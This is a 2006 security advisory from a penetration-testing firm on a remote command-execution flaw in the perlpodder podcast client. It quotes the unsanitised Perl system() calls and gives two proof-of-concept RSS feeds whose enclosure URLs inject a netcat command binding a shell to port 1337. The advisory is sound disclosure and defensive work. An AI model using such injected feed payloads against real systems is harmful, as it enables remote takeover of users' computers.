Kontakt

Kontaktieren Sie uns gerne

+49 241 510081-0
kontakt@redteam-pentesting.de
Kontaktformular
RedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting Header

Perlpodder Remote Arbitrary Command Execution

RedTeam identified a security flaw in perlpodder which makes it possible for a malicious podcast server to execute arbitrary shell commands on the victim’s client.

Details

  • Product: perlpodder
  • Affected Versions: All versions up to perlpodder-0.4
  • Fixed Versions: perlpodder-0.5
  • Vulnerability Type: Remote arbitrary command execution
  • Security-Risk: high
  • Vendor-URL: http://perlpodder.sourceforge.net/
  • Vendor-Status: informed, fixed
  • Advisory-URL: https://www.redteam-pentesting.de/advisories/rt-sa-2006-003
  • Advisory-Status: public
  • CVE: CVE-2006-2550 (echo vector)
  • CVE-2006-2548 (wget vector)
  • CVE-URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2550
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2548

Introduction

Perlpodder is a podcatcher script written in perl. It automates downloading podcasts.

(from perlpodder SourceForge page)

Podcasting is the distribution of multimedia files over the internet. Normally, a server is providing an RSS or Atom XML feed describing where to get the multimedia files. The client parses the feed and may then download the desired files.

More Details

When perlpodder is used to fetch a podcast, perlpodder will extract the URL of the audio-file from the XML-file the server provides. The URLs are saved in the variable “$dlset”. There are two occasions in the code where this variable will be used together with the system() command:

The first usage is with “echo” to log the URL (line 278):

[...]
277     # add urls to log file to mark as retrieved
278     $addurl = "echo " . $dlset . " >> $log_path ";
279     system $addurl;
[...]

The second usage is with “wget” to actually fetch the audio file (line 294):

[...]
291     # Prepair to call wget
292
293     $wget_path = "$cwd". "$datadir" ;
294     $wget_cmd = "wget --quiet --background -o /dev/null -c --tries=2 
                     --timeout=20 --random-wait " . $dlset . " -P ". $wget_path ;
295
296     if ($DEBUG > 0) {
297
298       print "running " . $wget_cmd . "\n" ;
299
300     }
301
302     system $wget_cmd;
[...]

Unfortunately, $dlset is never properly sanitized, so it is possible for the remote server to include arbitrary shell commands in the URL which will then be executed using system() (lines 279 and 302).

Proof of Concept

A minimal malicious server rss feed which exploits the “echo” call may look as follows:

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
    <title>RedTeam Pentesting Example Malicious Server Feed</title>

    <item>
        <enclosure url="http://www.example.com/example.mp3 >> /dev/null; nc -e /bin/sh -l -p 1337 &amp;#"
         length="241734" type="audio/mpeg" />
    </item>
</channel>
</rss>

The URL above will open port 1337 via netcat on the victim’s computer and bind a shell to it. This is just one example of how to exploit the vulnerability, as arbitrary commands can be included in the URL, but it should illustrate the point.

To exploit the “wget” call, the URL just has to be minimally adjusted:

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
    <title>RedTeam Pentesting</title>

    <item>
        <enclosure url="http://www.example.com/example.mp3; nc -e /bin/sh -l -p 1337 &amp;#"
         length="241734" type="audio/mpeg" />
    </item>
</channel>
</rss>

Workaround

Do not use perlpodder with untrusted servers.

Fix

Upgrade to perlpodder-0.5 immediately (http://prdownloads.sourceforge.net/perlpodder/perlpodder-0.5.tar.gz?download).

Security Risk

High, because arbitrary shell commands can be executed on the victim’s computer with the privileges of perlpodder (normally the user’s privileges).

History

  • 2006-05-19 Discovery of the problem
  • 2006-05-19 Notification of the author
  • 2006-05-21 Fixed version of perlpodder is released
  • 2006-05-22 Email from author pointing out the release
  • 2006-05-22 Public release of the advisory without CVE
    number because of public release by the author. CVE will be appended when available.
  • 2006-05-24 CVE added
  • 2009-05-08 Updated Advisory URL

RedTeam

RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories.

More information about RedTeam can be found at https://www.redteam-pentesting.de.